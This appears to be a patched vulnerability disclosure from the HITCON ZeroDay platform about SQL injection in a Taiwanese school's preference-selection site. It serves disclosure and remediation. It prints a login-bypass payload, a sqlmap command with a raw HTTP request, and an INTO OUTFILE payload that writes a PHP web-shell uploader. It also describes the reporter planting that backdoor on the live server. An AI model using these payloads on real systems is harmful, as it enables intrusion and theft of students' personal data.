Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2022-00351
- 發信 Vendor: TACERT台灣學術網路危機處理中心
- Title: 桃園市立中壢商業高級中等學校 志願選填系統資料庫注入漏洞
- Introduction: SQL Injection
處理狀態
目前狀態
公開
Last Update : 2022/06/10
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2022/05/22 00:54:47 : 新提交 (由 Ryan Lee 更新此狀態)
- 2022/05/22 01:06:48 : 新提交 (由 Ryan Lee 更新此狀態)
- 2022/05/22 12:04:31 : 新提交 (由 Ryan Lee 更新此狀態)
- 2022/05/22 15:57:59 : 新提交 (由 Ryan Lee 更新此狀態)
- 2022/05/23 12:54:09 : 新提交 (由 Ryan Lee 更新此狀態)
- 2022/05/24 15:57:53 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/05/30 17:51:59 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/05/30 17:51:59 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/05/30 17:51:59 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/06/02 16:03:01 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/06/10 03:00:19 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2022-00351
- 通報者:lee98064 (Ryan Lee)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://deptref.clvsc.tyc.edu.tw/
POST http://deptref.clvsc.tyc.edu.tw/checkpwd.php
GET http://deptref.clvsc.tyc.edu.tw/studlist.php?wish=
POST http://deptref.clvsc.tyc.edu.tw/checkpwd.php
GET http://deptref.clvsc.tyc.edu.tw/studlist.php?wish=
敘述
漏洞
在dnsdumpster上可以看到這一網站存在子域名下
使用 帳號:admin 密碼: ' or ‘2’=’2 的方式可以成功登入但噴錯誤。
使用sqlmap對登入網址進行注入
python sqlmap.py -r req.txt --dbsreq.txt內容
POST http://deptref.clvsc.tyc.edu.tw/checkpwd.php HTTP/1.1
Host: deptref.clvsc.tyc.edu.tw
Connection: keep-alive
Content-Length: 52
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://deptref.clvsc.tyc.edu.tw
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://deptref.clvsc.tyc.edu.tw/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=ect9430n5hfpki48clhqn7k69p; _ga=GA1.3.1954004224.1653134539; _gid=GA1.3.1934302957.1653134539; _gat_gtag_UA_119867755_1=1
txtid=admin&txtpass=123456&button=%E7%99%BB%E5%85%A5可獲得庫名與細部管理帳號密碼,學生身分證…等敏感資料,且管理員密碼是弱密碼
檢查後發現資料庫是DBA
用以下網址注入後門(竟然發現我的資料也在伺服器內T_T)
回報漏洞時已將後門刪除!!
http://deptref.clvsc.tyc.edu.tw/studlist.php?errmsg=1&wish=0' = '0' LIMIT 0,1 INTO OUTFILE 'C:/www/tmpuepgh14.php' fields terminated by '<form method="post" action="./tmpuepgh14.php"><textarea name="code"></textarea><button type="submit">Submit</button></form><?php if(isset($_REQUEST["code"])){fwrite(fopen("b374k.php", "w"), $_REQUEST["code"]);};?>' -- -可任意寫入內容,並查看與下載原始碼
回報漏洞時已將後門刪除!!
修補建議
1.使用參數法帶入SQL,而非直接串接SQL
2.不要使用DBA連線資料庫以免漏洞造成整台伺服器被控制
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。